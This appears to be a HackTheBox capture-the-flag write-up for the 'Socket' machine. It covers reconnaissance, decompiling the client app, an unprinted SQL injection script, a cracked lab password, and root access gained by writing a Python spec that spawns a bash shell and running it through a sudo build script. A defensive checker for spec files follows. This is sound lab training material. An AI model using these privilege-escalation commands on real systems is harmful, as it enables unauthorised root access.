Socket HackTheBox Writeup

badboy_17
Mar 29, 2023

https://app.hackthebox.com/machines/Socket

Socket is a newly released Open Beta Season Medium Linux box from HackTheBox.

Let’s Start

Nmap Output

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 13:35 EDT
Nmap scan report for qreader.htb (10.10.11.206)
Host is up (0.079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD
| http-server-header:
| Apache/2.4.52 (Ubuntu)
|_ Werkzeug/2.1.2 Python/3.10.6
5789/tcp open unknown
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Wed, 29 Mar 2023 17:36:42 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
| Failed to open a WebSocket connection: did not receive a valid HTTP request.
| Help, SSLSessionReq:
| HTTP/1.1 400 Bad Request
| Date: Wed, 29 Mar 2023 17:36:58 GMT
| Server: Python/3.10 websockets/10.4
| Content-Length: 77
| Content-Type: text/plain
| Connection: close
|_ Failed to open a WebSocket connection: did not receive a valid HTTP request.
[REDACTED]

Add “qreader.htb” to the hosts file.

Browsing the site it shows something like this

Download the app. The site is running on Flask, so let’s assume the app is also built with Python.

I’m using pyinstxtractor to decompile the app

wget https://raw.githubusercontent.com/extremecoders-re/pyinstxtractor/master/pyinstxtractor.py

python pyinstxtractor.py app/qreader.exe
pyinstxtractor output

cd to the output folder and decompile the extracted .pyc file

pip3 install uncompyle6

uncompyle6 qreader.pyc > qreader.py

Analyzing the code, there is a vulnerability in this part of the code

Next, let’s run a vulnerability scan of the WebSocket service on port 5789 with STEWS

python3 STEWS-vuln-detect.py -1 -n -u qreader.htb:5789

Let’s make a script to exploit the SQL injection found in the above source code

some usernames are found, looks great. 😍

here let’s try to get the password

here is the password which can be easily cracked with crackstation

password: “denjanjade122566”

SSH in and get user.txt

I had to try several times, as the username is tricky: “tkeller”

uh! initial access done :D

Privilege Escalation

running “sudo -l” gives this

Reviewing the “build-installer.sh” file, it seems OS commands can be run as root.

let’s get to the root…

echo 'import os;os.system("/bin/bash")' > b17.spec

sudo /usr/local/sbin/build-installer.sh build b17.spec

& it’s done !
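Why the one-line b17.spec works: PyInstaller executes a .spec file as ordinary Python, so whoever writes the spec decides what the build process runs. The following is an added example, not code from this writeup or from the box: a small static check that reports anything in a spec beyond the usual builder calls. The allowlist, the function name audit_spec and the benign sample spec are assumptions constructed for illustration.

```python
import ast

# Builder names a routine PyInstaller spec calls (assumed allowlist for this example).
ALLOWED_CALLS = {"Analysis", "PYZ", "EXE", "COLLECT", "BUNDLE", "MERGE", "Tree"}

# The spec written in the step above, and a constructed benign spec for comparison.
PAGE_SPEC = 'import os;os.system("/bin/bash")\n'
BENIGN_SPEC = (
    "a = Analysis(['qreader.py'], pathex=[], binaries=[], datas=[])\n"
    "pyz = PYZ(a.pure, a.zipped_data)\n"
    "exe = EXE(pyz, a.scripts, a.binaries, a.datas, name='qreader')\n"
)


def _name(func):
    """Render the callee of a call node as a dotted name where possible."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return f"{_name(func.value)}.{func.attr}"
    return "<expr>"


def audit_spec(source):
    """Parse a spec without executing it; return findings (empty list = nothing flagged)."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"line {exc.lineno}: not parseable as Python ({exc.msg})"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append(f"line {node.lineno}: import statement")
        elif isinstance(node, ast.Call):
            callee = node.func
            # Only bare calls to allowlisted builder names pass.
            if not (isinstance(callee, ast.Name) and callee.id in ALLOWED_CALLS):
                findings.append(f"line {node.lineno}: call to {_name(callee)}")
        elif isinstance(node, (ast.FunctionDef, ast.ClassDef, ast.Lambda)):
            findings.append(f"line {node.lineno}: function or class definition")
    return findings


if __name__ == "__main__":
    for label, spec in (("page spec", PAGE_SPEC), ("benign spec", BENIGN_SPEC)):
        print(label, "->", audit_spec(spec) or "nothing flagged")
```

A check like this is a review aid, not a sandbox: as long as the sudo rule runs the build on a spec file the calling user wrote, that user's Python runs as root.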

Let’s hope to see you again with some juicy stuff.

Until then, this is badboy_17, and I really do thank you for joining me.♥️


Hello This is badboy_17, a Medical student with a passion of Cyber World.